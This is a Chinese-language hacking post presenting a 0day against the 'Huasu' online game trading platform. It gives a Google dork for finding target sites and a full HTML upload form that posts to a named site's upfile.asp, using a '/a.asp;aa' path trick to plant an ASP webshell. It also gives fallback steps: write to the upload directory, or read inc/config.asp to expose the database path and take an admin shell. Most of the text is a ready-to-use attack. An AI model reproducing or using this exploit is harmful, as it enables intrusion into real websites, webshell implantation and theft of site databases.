华速网游交易平台oday分析

华速网游交易平台oday程序：华速网游交易平台
漏洞说明:上传，暴库
google关键字: inurl:list_buy.asp?class_1

EXP测试：
（复制代码保存为html文件）

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="css/manage.css" rel="stylesheet" type="text/css">
</head>
<body>
<form name="form1" method="post" action="http://www.hackqing.cn/upfile.asp" enctype="multipart/form-data" >
<div id="esave" style="position:absolute; top:18px; left:40px; z-index:10; visibility:hidden">
<TABLE WIDTH=340 BORDER=0 CELLSPACING=0 CELLPADDING=0>
<TR><td width=20%></td>
<TD bgcolor=#ff0000 width="60%">
<TABLE WIDTH=100% height=120 BORDER=0 CELLSPACING=1 CELLPADDING=0>
<TR>
<td bgcolor=#ffffff align=center><font color=red>正在上传文件，请稍候...</font></td>
</tr>
</table>
</td><td width=20%></td>
</tr></table></div>
<table class="tableBorder" width="90%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#FFFFFF">
<tr>
<td align="center"><b><font color="#ffffff">图片上传
<input type="hidden" name="filepath" value="/a.asp;aa">
<input type="hidden" name="filelx" value="">
<input type="hidden" name="EditName" value="">
<input type="hidden" name="FormName" value="">
<input type="hidden" name="act" value="uploadfile"></font></b>
</td>
</tr>
<tr >
<td align="center" id="upid" height="80">选择文件:
<input type="file" name="file1" size="40" class="tx1" value="">
<input class=btn type="submit" name="Submit" value="开始上传" class="button" onClick="javascript:mysub()">
</td>
</tr>
</table>
</form>
</body>
</html>

上传完毕，右键查看源码，上传的马就在根目录之下。
如果上传不了的话，把<input type="hidden" name="filepath" value="/a.asp;aa">的value的值修改为“/upfile/a.asp;aaa”，图片目录应该是可写的。

google关键字: inurl:list_buy.asp?class_1

如果上传失效的话，可以直接访问inc/config.asp文件，暴出数据库地址，进后台拿shell。